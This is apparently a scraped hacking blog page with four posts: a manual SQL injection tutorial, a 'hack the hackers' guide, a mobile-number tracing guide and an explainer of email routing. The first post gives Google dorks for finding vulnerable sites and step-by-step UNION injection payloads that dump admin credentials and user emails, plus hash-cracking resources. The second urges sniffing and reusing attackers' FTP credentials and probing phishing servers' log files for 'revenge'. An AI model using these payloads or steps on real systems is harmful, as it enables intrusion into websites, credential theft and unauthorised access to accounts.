Hacking websites SQL injection tutorial

Hacking websites SQL injection tutorial

Hello friends in my previous class of How to hack websites, there i explained the various topics that we will cover in hacking classes. Let’s today start with the first topic Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class don’t worry read it here.

So guys let’s start our tutorial of Hacking Websites using SQL injection technique. First of all, i will provide you the brief introduction about SQL injection.

Note: This article is for Educational Purposes only. Please Don’t misuse it. Isoftdl and me are not responsible of any misuse done by you.

MySQL database is very common database system these days that websites use and you will surprise with the fact that its the most vulnerable database system ever.Its has unlimited loopholes and fixing them is a very tedious task. Here we will discuss how to exploit those vulnerabilities manually without any tool.

                                              Hacking Websites using SQL Injection

STEPS TO HACK WEBSITES USING SQL INJECTION

1. Finding the target and vulnerable websites

First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites.. Below is example of some queries..

Examples: Open the Google and copy paste these queries…

inurl:index.php?id=

inurl:trainers.php?id=

inurl:buy.php?category=

inurl:article.php?ID=

inurl:play_old.php?id=

inurl:declaration_more.php?decl_id=

inurl:pageid=

inurl:games.php?id=

inurl:page.php?file=

inurl:newsDetail.php?id=

inurl:gallery.php?id=

Search google for more google dorks to hack websites. I cannot put them on my website as they are too critical to discuss. We can discuss them in comments of this posts so keep posting and reading there.

2. Checking for Vulnerability on the website

Suppose we have website like this:-

h**p://www.site.com/products.php?id=7

To test this URL, we add a quote to it ‘

h**p://www.site.com/products.php?id=7’

On executing it, if we get an error like this: “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”Or something like that, that means the target website is vulnerable to sql injection and you can hack it.

3). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

h**p://www.site.com/products.php?id=5 order by 1/* –> no error

h**p://www.site.com/products.php?id=5 order by 2/* –> no error

h**p://www.site.com/products.php?id=5 order by 3/* –> no error

h**p://www.site.com/products.php?id=5 order by 4/* –> Error (we get message like this Unknown column ‘4’ in ‘order clause’ or something like that)

that means that the it has 3 columns, cause we got an error on 4.

4). Check for UNION function

With union we can select more data in one sql statement.

So we have

h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

5). Check for MySQL version

h**p://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* not working or you get some error, then try —

it’s a comment and it’s important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version

we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this

h**p://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”

I didn’t see any paper covering this problem, so i must write it .

What we need is convert() function

i.e.

h**p://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

h**p://www.site.com/products.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .

6). Getting table and column name

Well if the MySQL version is less than 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL greater than 5 version.

we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…

i.e would be

h**p://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that’s good )

We know that table admin exists…

Now to check column names.

h**p://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc…

now to check if column password exists

h**p://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*

(if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up

i.e md5 hash, mysql hash, sha1…

Now we must complete query to look nice

For that we can use concat() function (it joins strings)

i.e

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

h**p://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username:password on screen, i.e admin:admin or admin:somehash

When you have this, you can login like admin or some superuser.

If can’t guess the right table name, you can always try mysql.user (default)

It has user password columns, so example would be

h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

7). MySQL 5

Like i said before i’m gonna explain how to get table and column names

in MySQL greater than 5.

For this we need information_schema. It holds all tables and columns in database.

To get tables we use table_name and information_schema.tables.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

h**p://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…

To get the column names the method is the same.

Here we use column_name and information_schema.columns

the method is same as above so example would be

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.

The second one (we change limit 0,1 to limit 1,1)

ie.

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc…

If you wanna display column names for specific table use this query. (where clause)

Let’s say that we found table users.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won’t work if the magic quotes is ON.

Let’s say that we found colums user, pass and email.

Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.

i.e

h**p://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from table users.

Example: admin:hash:whatever@blabla.com

But the passwords are in hash format so we need to crack the hash. Note 90% of hash are crackable but 10% are still there which are unable to crack. So don’t feel bad if some hash doesn’t crack.

For Cracking the MD5 hash values you can use this :

1) Check the net whether this hash is cracked before:

Download:

http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:

Download::

http://www.milw0rm.com/cracker/insert.php

or

http://passcracking.com/index.php

3) Use a MD5 cracking software:

Download:

http://rapidshare.com/files/13696796…CF_2.10_2b.rar

Password = OwlsNest

I hope you all have liked it and surely got something how SQL injection works. For more website hacking tutorials keep visiting..

IF YOU HAVE ANY QUERIES ASK ME!

How to hack the Hackers tutorial

Hello Friends, Merry Christmas to all my website users. So lets end this year with a awesome article that is How to hack the Hackers tutorial. In this tutorial i will explain how to hack the hackers with practical examples and you will really enjoy it. Today i will teach you how to hack the hackers ethically and take revenge from them. Most of us thinks that hackers are extreme computer geeks , its truth but most of hackers are not that much and they always leaves the traces and do very basic and extreme mistakes that will make them even vulnerable to expert guys like me. Today you all will came to know how i hacked almost all hackers accounts , its pity much simple but you must know what to do and how to do. Don’t worry you don’t have to do much as i have already done that for you. What you have to do is just read the methods How we can hack the hackers… so friends read on the article..

            

Topics that we cover:

1. Hacking the Keyloggers

a. By reverse engineering and viewing the code of keyloggers.

b. By network packet sniffing with wireshark packet sniffer.

2. Hacking the Hackers Hack tools by reverse Engineering.

3. Hacking the phishing web pages(fake pages) of hackers.

So by looking at the above topics that we will cover today you will now be very curious that how really it works. So lets start from the first topic..

HACKING THE KEYLOGGERS:

a. By reverse engineering and viewing the code of keyloggers.

For this we will need Binary File Extractor. What binary file extractor does that it decodes the executable files in binary string format and then converts them to understandable text.  The best tool in this category is provided by McAfee security forensics is Bintext 3.03. You can directly download this tool from McAfee’s website .

To download Bintext 3.03 : Click Here

Below is the video in which i have shown how we can hack the hackers account where he is uploading data.Watch it and enjoy it…

Isn’t that awesome and for your information guys its a 110% working method…

Also you can prevent yourself from keylogger by this technique:

b. By network Packet Sniffing using wireshark packet sniffer

For this hack you will need a packet sniffer called wireshark , best in its category, its also a free tool and you can download it from:

http://www.wireshark.org/

After Downloading the wireshark, install the software and open it. Now how it really works, Most of the remote keyloggers or Rats upload your system data to hackers FTP after every 2 to 10 minutes interval. What we do is that we will monitor our own network using the wireshark packet sniffer and check the connections that our network is making with other websites or networks basically IP addresses. Now we search the FTP in that which works on Port 21 and then we can easily sniff the password of that FTP account as FTP uses connection control protocol which means its header consists of username and password of FTP on which hacker is uploading data.

Here are Steps to use Wireshark?

1. Open the wireshark, choose your network and start monitoring your own system. (In wireshark you can see all the details of type of connections that you are using like FTP,HTTP,UDP etc..)

2. Now the hacker has set a particular timing to send files from your system varying from 2 to 10 mins . So continue monitoring for 10 to 15 mins.

3. Now the hacker is uploading your data to FTP site.So filter the results by FTP as shown below:

4. Now you will see the keylogger or Hack tool is uploading your data to the FTP account. Now you will able to see the username of FTP account and its Password and much more..as shown below:

5. Now you have hackers FTP address , his username and his password. So why are you waiting open the hackers website and his account and take your revenge from him…

I hope you all have liked this technique also… Also friends this technique is also 110% working.

2. Hacking the Hackers Hack tools using Reverse Engineering

In this we will use the bintext 3.03 only and the tutorial is absolutely similar to above. Just open the hack tool using the Bintext 3.03 and search for string “@”(without quotes) or “smtp” (without quotes) . where you will find the users FTP account or Email account with password . So visit the hackers account and hack his account…

3. Hacking the phishing webpages(fake pages) of hackers

Now you all are thinking that how you can hack it. Its also pity simple. 

STEPS:

1. Suppose a hacker sends you the fake page or phish page like this this:

Note : Its for Educational Purposes only. Any misuse will result into severe consequences.

2. Now copy the following link:

    just remove the file part .i.e test.html .

3. Now what you have to do replace test.html with following: a. log.txt or pass.txt or passes.txt or logs.txt or password.txt try them …. You will surely find the page where all the hacked information will be there.

4. Its done… rofl..

I hope you all have liked it… Isn’t its awesome so guys lets take revenge from hackers and become smarter than them…but not smarter than me….rofl..:P

Merry Christmas Friends!

If you have any queries ask me..

How to Trace Mobile Number or Phone Location

Today I will explain how to trace mobile numbers or phone locations in India. Nowadays, the popularity of mobiles and their usage is peaking. Crime and illegal activities via mobile phones – such as false, threatening, and harassing phone calls – is multiplying in geometric progression. In order to combat these practices, there must be something to trace these activities and criminals.

The above mentioned problem is not the only reason why we need to trace any mobile number or phone. Sometimes we have more serious occurrences, like calls from unknown senders, annoying fake calls, or even blackmail. We genuinely NEED to know who is calling, from where the call is coming, and who the service provider is.

 

 

 

Today I will explain the three different methods to trace a mobile number.

1. Tracing Manually from Wikipedia.

2. Tracing through Website or Internet.

3. Tracing through your mobile phone (phone must support Java applications).

 

LIMITATIONS:

We cannot reach the caller directly. We can only learn the location from where he is calling and which mobile operator service he is using. But we can use this to lodge a report of suspicion activity against the caller directly to his operator by reporting that particular sim card holder is executing false or threatening calls to you. If you can convince the operator with your report, they will temporarily block the caller’s sim card and lodge a report against the holder. If verification is successful, the caller can face imprisonment and/or a heavy fine. Limitations exist, but there are a lot of great advantages to tracing mobile phones.

 

Method 1: Tracing Manually by Looking to Code Planning Table

Using this method, we can trace the caller manually. We have to make some effort to see the Code planning table which you can get below:

http://en.wikipedia.org/wiki/Mobile_telephone_numbering_in_India

 

How do we use this table to trace mobile numbers or phones? 

All mobile numbers in India have the prefix 9, 8, or 7. Each zone is allowed to have multiple private operators. All mobile phone numbers are 10 digits long. The way the numbers are split is defined in the National Numbering Plan 2003 as XX-YYY-NNNNN where XX is the Network operator, YYY is the Mobile Switching Center, and NNNNN is the subscribe numbers. 

Now you can easily break a number in three parts and trace it according to the table.

 

 

Method 2: Tracing through website

This method is quite simple. You visit the following website, put the mobile number you want to search in the search box, and click on enter. It will search its database according to the National Numbering Plan for mobile devices, and returns you the required result.

Website to trace Mobile Number: http://trace.bharatiyamobile.com/

 

 

Method 3: Tracing through your Java Enabled Mobile

In this method, we use a small java application which is loaded with the above coding plan for offline phone usage. We have to install the java application onto the mobile.

Download Mobile Tracer: 

ShaPlus_Mobile_Info.jar  version 2.5 (25kb)
ShaPlus_Mobile_Info.jad (click this to install from phone)

After installing, run the application. Type the mobile phone number that you want to trace into the box and click on find. It searches its database and returns you the location and operator of the mobile phone number.

How email works tutorial

Hello friends, today i am going to explain you how an email address works. We will proceed step by step How email works tutorial. Why did we need to understand the working of emails , just for curiosity! No really don’t.

The real motive behind learning How email works is that if we know things that how they works then we can easily prevent our self from being hacked or attacked by hackers or malwares. So friends keep reading the article…

From the general user point of view, the working of emails looks quite simple. You select the address of the person to whom you want to send the email, compose your message and click ‘Send’.

But in reality the working of emails is quite complicated. Before proceeding further i will introduce some terms that i will use frequently so i prefer to define them at start.

1. Mail User Agent (MUA) : The MUA is the application the sender(who composes mail)  uses to compose and read email, such as Eudora, Outlook, Thunderbird, etc. 

2. Mail Delivery Agent (MDA): A mail delivery agent or message delivery agent (MDA) is a computer software component that is responsible for the delivery of e-mail messages to a local recipient’s mailbox.

3. Mail Transfer Agent (MTA): A message transfer agent or mail transfer agent (MTA) or mail relay is software that transfers electronic mail messages from one computer to another using a client-server application architecture.

4. Domain Name System (DNS):In simpler words, a domain name system (DNS) translates the domain name to IP addresses. 

STEPWISE WORKING OF EMAILS:

Step A: Sender creates and sends an email

The originating sender creates an email in their Mail User Agent (MUA) and clicks ‘Send’. The MUA is the application the originating sender uses to compose and read email, such as Eudora, Outlook, Thunderbird, etc.

Step B: Sender’s MDA/MTA routes the email

The sender’s MUA transfers the email to a Mail Delivery Agent (MDA). Frequently, the sender’s MTA also handles the responsibilities of an MDA. Several of the most common MTAs do this, including send-mail and qmail (which Gmail uses).

The MDA/MTA accepts the email, then routes it to local mailboxes or forwards it if it isn’t locally addressed.

In our diagram, an MDA forwards the email to an MTA and it enters the first of a series of “network clouds,” labeled as a “Company Network” cloud.

Step C: Network cloud

An email can encounter a network cloud(means Internet) within a large company or ISP( Internet Service Provider), or the largest network cloud in existence: the Internet. The network cloud may encompass a multitude of mail servers, DNS servers, routers, lions, tigers, bears (wolves!) and other devices and services too numerous to mention. These are prone to be slow when processing an unusually heavy load, temporarily unable to receive an email when taken down for maintenance, and sometimes may not have identified themselves properly to the Internet through the Domain Name System (DNS) so that other MTAs in the network cloud are unable to deliver mail as addressed. These devices may be protected by firewalls, spam filters and malware detection software that may bounce or even delete an email. When an email is deleted by this kind of software, it tends to fail silently, so the sender is given no information about where or when the delivery failure occurred.

Email service providers and other companies that process a large volume of email often have their own, private network clouds. These organizations commonly have multiple mail servers, and route all email through a central gateway server (i.e., mail hub) that redistributes mail to whichever MTA is available. Email on these secondary MTAs must usually wait for the primary MTA (i.e., the designated host for that domain) to become available, at which time the secondary mail server will transfer its messages to the primary MTA.

Step D: Email queue

The email in the diagram is addressed to someone at another company, so it enters an email queue with other outgoing email messages. If there is a high volume of mail in the queue—either because there are many messages or the messages are unusually large, or both—the message will be delayed in the queue until the MTA processes the messages ahead of it.

Step E: MTA to MTA transfer

When transferring an email, the sending MTA handles all aspects of mail delivery until the message has been either accepted or rejected by the receiving MTA.
As the email clears the queue, it enters the Internet network cloud, where it is routed along a host-to-host chain of servers. Each MTA in the Internet network cloud needs to “stop and ask directions” from the Domain Name System (DNS) in order to identify the next MTA in the delivery chain. The exact route depends partly on server availability and mostly on which MTA can be found to accept email for the domain specified in the address. Most email takes a path that is dependent on server availability, so a pair of messages originating from the same host and addressed to the same receiving host could take different paths. These days, it’s mostly spammers that specify any part of the path, deliberately routing their message through a series of relay servers in an attempt to obscure the true origin of the message.
To find the recipient’s IP address and mailbox, the MTA must drill down through the Domain Name System (DNS), which consists of a set of servers distributed across the Internet. Beginning with the root nameservers at the top-level domain (.tld), then domain nameservers that handle requests for domains within that .tld, and eventually to nameservers that know about the local domain.

Step F: Firewalls, spam and virus filters

The transfer process described in the last step is somewhat simplified. An email may be transferred to more than one MTA within a network cloud and is likely to be passed to at least one firewall before it reaches it’s destination.

An email encountering a firewall may be tested by spam and virus filters before it is allowed to pass inside the firewall. These filters test to see if the message qualifies as spam or malware. If the message contains malware, the file is usually quarantined and the sender is notified. If the message is identified as spam, it will probably be deleted without notifying the sender.

Spam is difficult to detect because it can assume so many different forms, so spam filters test on a broad set of criteria and tend to misclassified a significant number of messages as spam, particularly messages from mailing lists. When an email from a list or other automated source seems to have vanished somewhere in the network cloud, the culprit is usually a spam filter at the receiver’s ISP or company. This explained in greater detail in Virus Scanning and Spam Blocking.

For More About Emails Working keeps reading. In my Next Posts I will explain How to trace any email address that from where it has been sent and who sent it and whats is computer name and much more…

If you Have Any Queries Post your Comments!